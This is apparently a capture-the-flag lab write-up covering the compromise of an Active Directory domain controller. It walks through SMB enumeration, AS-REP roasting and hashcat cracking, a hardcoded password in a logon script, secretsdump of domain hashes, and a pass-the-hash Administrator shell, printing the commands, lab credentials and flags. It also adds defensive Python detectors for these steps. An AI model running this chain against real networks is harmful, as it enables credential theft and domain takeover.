PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-02-20 21:31:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49665/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49683/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows
There is a lot of information here; the key takeaways are:
Port 139/445 > Samba service active
Port 88 > Microsoft Windows Kerberos
Port 389/3268 > Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
Enumeration
SMB
Checking SMB first, as the obvious choice, listing the shares shows:
smbclient -L $TARGET -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
VulnNet-Business-Anonymous Disk VulnNet Business Sharing
VulnNet-Enterprise-Anonymous Disk VulnNet Enterprise Sharing
The following shares are accessible and have content that can be pulled and read:
smbclient //$TARGET/VulnNet-Business-Anonymous -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Mar 12 18:46:40 2021
.. D 0 Fri Mar 12 18:46:40 2021
Business-Manager.txt A 758 Thu Mar 11 17:24:34 2021
Business-Sections.txt A 654 Thu Mar 11 17:24:34 2021
Business-Tracking.txt A 471 Thu Mar 11 17:24:34 2021
smbclient //$TARGET/VulnNet-Enterprise-Anonymous -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Mar 12 18:46:40 2021
.. D 0 Fri Mar 12 18:46:40 2021
Enterprise-Operations.txt A 467 Thu Mar 11 17:24:34 2021
Enterprise-Safety.txt A 503 Thu Mar 11 17:24:34 2021
Enterprise-Sync.txt A 496 Thu Mar 11 17:24:34 2021
Reading these files reveals a plethora of useful information, primarily user information. The tool crackmapexec, which is used to collect Active Directory information, can be used to gather further usernames with the following command:
Another tool that can do the same thing is Impacket's lookupsid.py module:
lookupsid.py -no-pass anonymous@$TARGET
Kerberos
Since I have crafted a list of possible usernames and there is an open Kerberos service, I can attempt "Kerberoasting", an attack method for cracking the hashes of service accounts in Active Directory. This requests tickets from the Domain Controller and cracks them offline with a tool like hashcat or John the Ripper to recover the actual passwords.
Using Impacket, an open source toolkit installed on Kali, I can use modules like GetUserSPNs or GetNPUsers to try to get some ticket responses; the former requires a password and the latter does not. The GetNPUsers module performs AS-REP roasting: if a user account has the DONT_REQ_PREAUTH attribute set, the KDC answers an AS-REQ for that user with a KRB_AS_REP even though no password was supplied, and the encrypted part of that reply can be cracked offline to recover the user's password.
GetNPUsers.py -format hashcat -usersfile roasted_users.txt -outputfile hash-hashcat.txt -dc-ip $TARGET vulnnet-rst/
Impacket v0.11.0 - Copyright 2023 Fortra
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$t-skid@VULNNET-RST:ac09439c236620b9bc13c6b0c570c4b3$0493b49742538cc119ea4aaa99dec306f5dbd250867dd4804b3c0f39e6e916e4fee31ae087e13e34237064797307de308c0ef51292f8031ba0a79ec803232a597b316b051725402f2fc84eb875d283504fa086fddc8a66642f5c5b4cdae192d2b2cae954b4ba77f01c5aac49b2386e3f46ec4be702f25453ca0517ddb4e2e4c14298b12d5e4428b5d9d4021672874b47bf2930a231eafd0c330ddcbca39a9867a61b7b475ca8d57c2004ae9da701a50292305a7d408a0dba1d99d1a77cbe9746645f868e7455d9230685113d3f17a4f5d82044656018090f1d1a8376115d67d19f6613ecc23b5150228811133e859a04
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
The user "t-skid" returned a TGT hash, which can then be cracked in hashcat. Running hashcat -h | grep -i "kerberos" lists a number of modes; the correct one is "18200 | Kerberos 5, etype 23, AS-REP".
sudo hashcat -m 18200 -a 0 hash-hashcat.txt $ROCKYOU
This gives the password for user t-skid: tj072889*
Username: t-skid
Password: tj072889*
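A defender-side view of the AS-REP roasting exchange above, as an added example that is not part of the original writeup: it runs over constructed, simplified event 4768 records (key=value lines modelled on the real event's fields) and flags TGTs issued with no pre-authentication, the revoked-account error the tool hit, and a source that requests tickets for many accounts. The field layout, the IP addresses and the svc-old account are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample Security event 4768 records (TGT requested), one per line as
# key=value pairs modelled on the real event's fields; values invented for this example.
SAMPLE_4768 = """\
EventID=4768 TargetUserName=t-skid TargetDomainName=VULNNET-RST ServiceName=krbtgt TicketEncryptionType=0x17 PreAuthType=0 Status=0x0 IpAddress=10.0.0.99
EventID=4768 TargetUserName=a-whitehat TargetDomainName=VULNNET-RST ServiceName=krbtgt TicketEncryptionType=0x12 PreAuthType=2 Status=0x0 IpAddress=10.0.0.20
EventID=4768 TargetUserName=svc-old TargetDomainName=VULNNET-RST ServiceName=krbtgt TicketEncryptionType=0xffffffff PreAuthType=- Status=0x12 IpAddress=10.0.0.99
EventID=4768 TargetUserName=WIN-2BO8M1OE1M1$ TargetDomainName=VULNNET-RST ServiceName=krbtgt TicketEncryptionType=0x12 PreAuthType=2 Status=0x0 IpAddress=10.0.0.10
"""

KDC_ERR_CLIENT_REVOKED = "0x12"  # the SessionError GetNPUsers printed above
RC4_HMAC = "0x17"                # etype 23: the AS-REP flavour hashcat mode 18200 cracks

def parse_event(line):
    """Turn one key=value record into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def classify(ev):
    """Label one 4768 event, or return None when it looks like a normal logon."""
    if ev.get("EventID") != "4768":
        return None
    if ev.get("Status") == "0x0" and ev.get("PreAuthType") == "0":
        # TGT issued with no pre-authentication: the account has DONT_REQ_PREAUTH,
        # so its AS-REP can be captured and cracked offline; RC4 is the cheapest to crack.
        return "asrep-roastable-rc4" if ev.get("TicketEncryptionType") == RC4_HMAC else "asrep-roastable"
    if ev.get("Status") == KDC_ERR_CLIENT_REVOKED:
        return "revoked-account-probed"
    return None

def find_asrep_activity(log_text):
    """Findings as (account, label, source_ip) tuples, in log order."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        label = classify(ev)
        if label:
            findings.append((ev["TargetUserName"], label, ev["IpAddress"]))
    return findings

def sources_touching_many_accounts(log_text, threshold=2):
    """Source IPs whose 4768 events name at least `threshold` distinct accounts;
    a wordlist-driven tool such as GetNPUsers walks many names from one host."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") == "4768":
            seen[ev["IpAddress"]].add(ev["TargetUserName"])
    return sorted(ip for ip, names in seen.items() if len(names) >= threshold)
```

The durable fix is clearing DONT_REQ_PREAUTH on the flagged account and retiring RC4 for it, so that a captured AS-REP is AES-encrypted and far costlier to crack.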
Exploitation
After getting the initial credentials, I tried to enumerate the other shares that were previously inaccessible. The NETLOGON share was accessible this time and contained a file called ResetPassword.vbs. The following commands worked to log in and retrieve the file:
smbclient //$TARGET/NETLOGON -U t-skid
Password for [WORKGROUP\t-skid]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Mar 16 16:15:49 2021
.. D 0 Tue Mar 16 16:15:49 2021
ResetPassword.vbs A 2821 Tue Mar 16 16:18:14 2021
8771839 blocks of size 4096. 4534166 blocks available
smb: \> get ResetPassword.vbs
getting file \ResetPassword.vbs of size 2821 as ResetPassword.vbs (2.2 KiloBytes/sec) (average 2.2 KiloBytes/sec)
The retrieved file shows the following:
ResetPassword.vbs
Option Explicit
Dim objRootDSE, strDNSDomain, objTrans, strNetBIOSDomain
Dim strUserDN, objUser, strPassword, strUserNTName
' Constants for the NameTranslate object.
Const ADS_NAME_INITTYPE_GC = 3
Const ADS_NAME_TYPE_NT4 = 3
Const ADS_NAME_TYPE_1779 = 1
If (Wscript.Arguments.Count <> 0) Then
    Wscript.Echo "Syntax Error. Correct syntax is:"
    Wscript.Echo "cscript ResetPassword.vbs"
    Wscript.Quit
End If
strUserNTName = "a-whitehat"
strPassword = "bNdKVkjv3RR9ht"
' Determine DNS domain name from RootDSE object.
Set objRootDSE = GetObject("LDAP://RootDSE")
strDNSDomain = objRootDSE.Get("defaultNamingContext")
' Use the NameTranslate object to find the NetBIOS domain name from the
' DNS domain name.
Set objTrans = CreateObject("NameTranslate")
objTrans.Init ADS_NAME_INITTYPE_GC, ""
objTrans.Set ADS_NAME_TYPE_1779, strDNSDomain
strNetBIOSDomain = objTrans.Get(ADS_NAME_TYPE_NT4)
' Remove trailing backslash.
strNetBIOSDomain = Left(strNetBIOSDomain, Len(strNetBIOSDomain) - 1)
' Use the NameTranslate object to convert the NT user name to the
' Distinguished Name required for the LDAP provider.
On Error Resume Next
objTrans.Set ADS_NAME_TYPE_NT4, strNetBIOSDomain & "\" & strUserNTName
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "User " & strUserNTName _
        & " not found in Active Directory"
    Wscript.Echo "Program aborted"
    Wscript.Quit
End If
strUserDN = objTrans.Get(ADS_NAME_TYPE_1779)
' Escape any forward slash characters, "/", with the backslash
' escape character. All other characters that should be escaped are.
strUserDN = Replace(strUserDN, "/", "\/")
' Bind to the user object in Active Directory with the LDAP provider.
On Error Resume Next
Set objUser = GetObject("LDAP://" & strUserDN)
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "User " & strUserNTName _
        & " not found in Active Directory"
    Wscript.Echo "Program aborted"
    Wscript.Quit
End If
objUser.SetPassword strPassword
If (Err.Number <> 0) Then
    On Error GoTo 0
    Wscript.Echo "Password NOT reset for " & vbCrLf & strUserNTName
    Wscript.Echo "Password " & strPassword & " may not be allowed, or"
    Wscript.Echo "this client may not support a SSL connection."
    Wscript.Echo "Program aborted"
    Wscript.Quit
Else
    objUser.AccountDisabled = False
    objUser.Put "pwdLastSet", 0
    Err.Clear
    objUser.SetInfo
    If (Err.Number <> 0) Then
        On Error GoTo 0
        Wscript.Echo "Password reset for " & strUserNTName
        Wscript.Echo "But, unable to enable account or expire password"
        Wscript.Quit
    End If
End If
On Error GoTo 0
Wscript.Echo "Password reset, account enabled,"
Wscript.Echo "and password expired for user " & strUserNTName
In the beginning of the script are the credentials for user a-whitehat:
Username: a-whitehat
Password: bNdKVkjv3RR9ht
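The weakness in the script is the literal credential it carries in a share every domain member can read. As an added example, not from the writeup or the room, here is an audit that walks a copy of NETLOGON/SYSVOL and reports such literals with the value redacted; the patterns, the suffix list and the two sample scripts are constructed assumptions.

```python
import re
from pathlib import Path

# Literal-secret assignments as they appear in VBScript, batch and PowerShell logon
# scripts. Constructed for this example; extend with your own script conventions.
SECRET_PATTERNS = [
    ("string assignment", re.compile(r'(?i)\$?\b(?:str)?(?:pass(?:word)?|pwd)\s*=\s*"([^"]+)"')),
    ("ConvertTo-SecureString literal", re.compile(r'(?i)ConvertTo-SecureString\s+"([^"]+)"\s+-AsPlainText')),
    ("net use password argument", re.compile(r'(?i)\bnet\s+use\b.*?/user:\S+\s+(\S+)')),
]
SCRIPT_SUFFIXES = {".vbs", ".bat", ".cmd", ".ps1"}
COMMENT_PREFIXES = ("'", "REM ", "rem ", "::", "#")

def redact(secret):
    """Keep only the first character and the length so the report itself leaks nothing."""
    return secret[0] + "*" * (len(secret) - 1)

def scan_text(name, text):
    """Findings (name, line_no, pattern_label, redacted_value) for one script body."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith(COMMENT_PREFIXES):
            continue
        for label, pattern in SECRET_PATTERNS:
            match = pattern.search(line)
            if match:
                findings.append((name, no, label, redact(match.group(1))))
    return findings

def scan_share(root):
    """Walk a copied or mounted NETLOGON/SYSVOL tree and scan every script in it."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in SCRIPT_SUFFIXES:
            findings.extend(scan_text(str(path.relative_to(root)), path.read_text(errors="replace")))
    return findings

# Constructed sample scripts shaped like the finding above; the values are invented.
SAMPLE_VBS = 'Option Explicit\nDim strPassword\nstrUserNTName = "svc-example"\nstrPassword = "Example#Secret1"\n'
SAMPLE_BAT = '@echo off\nREM map the finance share\nnet use F: \\\\fs01\\finance /user:CORP\\svc-map P@ssw0rd!\n'
```

Any hit is a credential to rotate, not just a line to delete, since the share history and every backup of it already exposed the value.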
User a-whitehat actually has privileges to do a number of things, including reading from and writing to the ADMIN$ share. This can be shown with the following command:
Logging into the ADMIN$ share and navigating to the \Users\enterprise-core-vn\Desktop\ path shows the user flag user.txt.
user.txt: THM{726b7c0baaac1455d05c827b5561f4ed}
Privilege Escalation
Trying to print out the system flag straight from here failed with an "Access Denied" prompt. No worries: since user a-whitehat has write access to SMB as an administrator, it is possible to use the Impacket module secretsdump to dump the SAM hashes. These hashes could potentially be used to get a shell on the box.
secretsdump.py vulnnet-rst/a-whitehat:bNdKVkjv3RR9ht@$TARGET
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] NL$KM
0000 F3 F6 6B 8D 1E 2A F4 8E 85 F6 7A 46 D1 25 A0 D3 ..k..*....zF.%..
0010 EA F4 90 7D 2D CB A5 8C 88 C5 68 4C 1E D3 67 3B ...}-.....hL..g;
0020 DB 31 D9 91 C9 BB 6A 57 EA 18 2C 90 D3 06 F8 31 .1....jW..,....1
0030 7C 8C 31 96 5E 53 5B 85 60 B4 D5 6B 47 61 85 4A |.1.^S[.`..kGa.J
NL$KM:f3f66b8d1e2af48e85f67a46d125a0d3eaf4907d2dcba58c88c5684c1ed3673bdb31d991c9bb6a57ea182c90d306f8317c8c31965e535b8560b4d56b4761854a
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7633f01273fc92450b429d6067d1ca32:::
vulnnet-rst.local\enterprise-core-vn:1104:aad3b435b51404eeaad3b435b51404ee:8752ed9e26e6823754dce673de76ddaf:::
vulnnet-rst.local\a-whitehat:1105:aad3b435b51404eeaad3b435b51404ee:1bd408897141aa076d62e9bfc1a5956b:::
vulnnet-rst.local\t-skid:1109:aad3b435b51404eeaad3b435b51404ee:49840e8a32937578f8c55fdca55ac60b:::
vulnnet-rst.local\j-goldenhand:1110:aad3b435b51404eeaad3b435b51404ee:1b1565ec2b57b756b912b5dc36bc272a:::
vulnnet-rst.local\j-leet:1111:aad3b435b51404eeaad3b435b51404ee:605e5542d42ea181adeca1471027e022:::
WIN-2BO8M1OE1M1$:1000:aad3b435b51404eeaad3b435b51404ee:b29bcd4a0cbf3f4661e3441ecce96db5:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:7f9adcf2cb65ebb5babde6ec63e0c8165a982195415d81376d1f4ae45072ab83
Administrator:aes128-cts-hmac-sha1-96:d9d0cc6b879ca5b7cfa7633ffc81b849
Administrator:des-cbc-md5:52d325cb2acd8fc1
krbtgt:aes256-cts-hmac-sha1-96:a27160e8a53b1b151fa34f45524a07eb9899ebdf0051b20d677f0c3b518885bd
krbtgt:aes128-cts-hmac-sha1-96:75c22aac8f2b729a3a5acacec729e353
krbtgt:des-cbc-md5:1357f2e9d3bc0bd3
vulnnet-rst.local\enterprise-core-vn:aes256-cts-hmac-sha1-96:9da9e2e1e8b5093fb17b9a4492653ceab4d57a451bd41de36b7f6e06e91e98f3
vulnnet-rst.local\enterprise-core-vn:aes128-cts-hmac-sha1-96:47ca3e5209bc0a75b5622d20c4c81d46
vulnnet-rst.local\enterprise-core-vn:des-cbc-md5:200e0102ce868016
vulnnet-rst.local\a-whitehat:aes256-cts-hmac-sha1-96:f0858a267acc0a7170e8ee9a57168a0e1439dc0faf6bc0858a57687a504e4e4c
vulnnet-rst.local\a-whitehat:aes128-cts-hmac-sha1-96:3fafd145cdf36acaf1c0e3ca1d1c5c8d
vulnnet-rst.local\a-whitehat:des-cbc-md5:028032c2a8043ddf
vulnnet-rst.local\t-skid:aes256-cts-hmac-sha1-96:a7d2006d21285baee8e46454649f3bd4a1790c7f4be7dd0ce72360dc6c962032
vulnnet-rst.local\t-skid:aes128-cts-hmac-sha1-96:8bdfe91cca8b16d1b3b3fb6c02565d16
vulnnet-rst.local\t-skid:des-cbc-md5:25c2739dcb646bfd
vulnnet-rst.local\j-goldenhand:aes256-cts-hmac-sha1-96:fc08aeb44404f23ff98ebc3aba97242155060928425ec583a7f128a218e4c5ad
vulnnet-rst.local\j-goldenhand:aes128-cts-hmac-sha1-96:7d218a77c73d2ea643779ac9b125230a
vulnnet-rst.local\j-goldenhand:des-cbc-md5:c4e65d49feb63180
vulnnet-rst.local\j-leet:aes256-cts-hmac-sha1-96:1327c55f2fa5e4855d990962d24986b63921bd8a10c02e862653a0ac44319c62
vulnnet-rst.local\j-leet:aes128-cts-hmac-sha1-96:f5d92fe6dc0f8e823f229fab824c1aa9
vulnnet-rst.local\j-leet:des-cbc-md5:0815580254a49854
WIN-2BO8M1OE1M1$:aes256-cts-hmac-sha1-96:54c1fcdbe4b883e52e3008ca027bbc06fb69be39535b5f8f1112d6ab11937bf0
WIN-2BO8M1OE1M1$:aes128-cts-hmac-sha1-96:e06812ec14e5b3d29f7823aa292dee0f
WIN-2BO8M1OE1M1$:des-cbc-md5:92da58ef759ee046
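The "DRSUAPI method" in the output above is directory replication (DCSync), which a domain controller audits as event 4662 carrying the replication extended rights. As an added example that is not part of the original writeup, here is a check over constructed, flattened 4662 records that reports replication by any principal outside an assumed allow-list of DC computer accounts; the field layout, the placeholder GUID and the allow-list are assumptions.

```python
import re

# Well-known AD extended-right GUIDs that a DRSUAPI replication (DCSync) call exercises.
REPLICATION_RIGHTS = {
    "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}": "DS-Replication-Get-Changes",
    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}": "DS-Replication-Get-Changes-All",
    "{89e95b76-444d-4c62-991a-0facbeda640c}": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = "0x100"  # AccessMask value 4662 reports for extended-right use

# Constructed sample Security event 4662 records, one per line as key=value pairs with
# Properties flattened to a comma list; values are invented for this example and the
# all-zero GUID is a placeholder for an unrelated property.
SAMPLE_4662 = """\
EventID=4662 SubjectUserName=WIN-2BO8M1OE1M1$ SubjectDomainName=VULNNET-RST ObjectType=domainDNS AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectUserName=a-whitehat SubjectDomainName=VULNNET-RST ObjectType=domainDNS AccessMask=0x100 Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectUserName=a-whitehat SubjectDomainName=VULNNET-RST ObjectType=user AccessMask=0x10 Properties={00000000-0000-0000-0000-000000000000}
"""

# Principals allowed to replicate: DC computer accounts (plus any directory sync
# accounts you run). Assumed for this example; populate from your own environment.
REPLICATION_ALLOWLIST = {"WIN-2BO8M1OE1M1$"}

def parse_event(line):
    """Turn one key=value record into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def replication_rights_used(ev):
    """Names of replication extended rights exercised by this 4662 event (may be empty)."""
    if ev.get("EventID") != "4662" or ev.get("AccessMask") != CONTROL_ACCESS:
        return []
    guids = ev.get("Properties", "").lower().split(",")
    return [REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS]

def find_dcsync(log_text, allowlist=REPLICATION_ALLOWLIST):
    """(subject, rights) for every replication call by a principal that should never
    replicate; Get-Changes-All is the right that hands over password hashes."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        rights = replication_rights_used(ev)
        if rights and ev["SubjectUserName"] not in allowlist:
            findings.append((ev["SubjectUserName"], rights))
    return findings
```

The audit only fires if the domain object's SACL audits Control Access for Everyone; without that entry, 4662 is never written for these rights.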
The NT hash of the Administrator is the fourth colon-separated field of the Administrator line under "Dumping local SAM hashes". It can be used with the tool evil-winrm, a powerful shell utility built on Windows Remote Management, to gain an administrator shell:
evil-winrm -i $TARGET -u Administrator -H c2597747aa5e43022a3a3049a3c3b09d
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
vulnnet-rst\administrator
Navigating to C:\Users\Administrator\Desktop reveals the system.txt flag!